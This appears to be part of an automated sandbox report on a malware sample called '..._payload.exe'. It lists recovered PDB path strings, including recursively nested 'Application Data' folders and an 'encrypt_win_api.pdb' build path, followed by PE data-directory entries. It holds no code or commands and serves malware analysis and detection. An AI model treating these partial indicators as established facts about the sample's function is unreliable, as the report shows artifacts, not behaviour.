              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003C26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\X source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\p\- source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251080691.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241819824.000000000396A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242783147.0000000003976000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253471637.0000000003986000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284103523.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2291587000.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261492169.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290747950.00000000037C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241819824.0000000003999000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242648733.0000000003999000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299664958.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290353471.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303180296.0000000003B63000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303090590.0000000003B33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251080691.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251080691.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261912171.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Cache\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2307032811.0000000003BF2000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309605483.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B4B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2264167577.000000000335B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262447295.000000000334D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253827941.0000000003B5B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Users source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1960744215.0000000003391000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\mp source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283628398.00000000037EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B4B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253827941.0000000003B5B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303180296.0000000003B63000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303090590.0000000003B33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2243108340.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220175784.00000000037D5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2307032811.0000000003BF2000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309605483.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\G source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003BC2000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133521717815553933.txt source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193490416.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\Adobe source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2307032811.0000000003BF2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\L source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb`6 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242821627.0000000003B57000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B4B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ad_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283575047.000000000395A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283443210.0000000003913000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1923906292.0000000003366000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\he\= source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003C05000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003BDB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\C:\U source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1960744215.0000000003391000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242273475.0000000003864000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242219779.0000000003807000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284786483.000000000388C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003881000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285842625.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285127937.0000000003899000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\" source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B92000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2221073589.000000000394A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219793870.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219793870.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\Snz source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193886000.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242573181.00000000037F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\t source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220925314.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
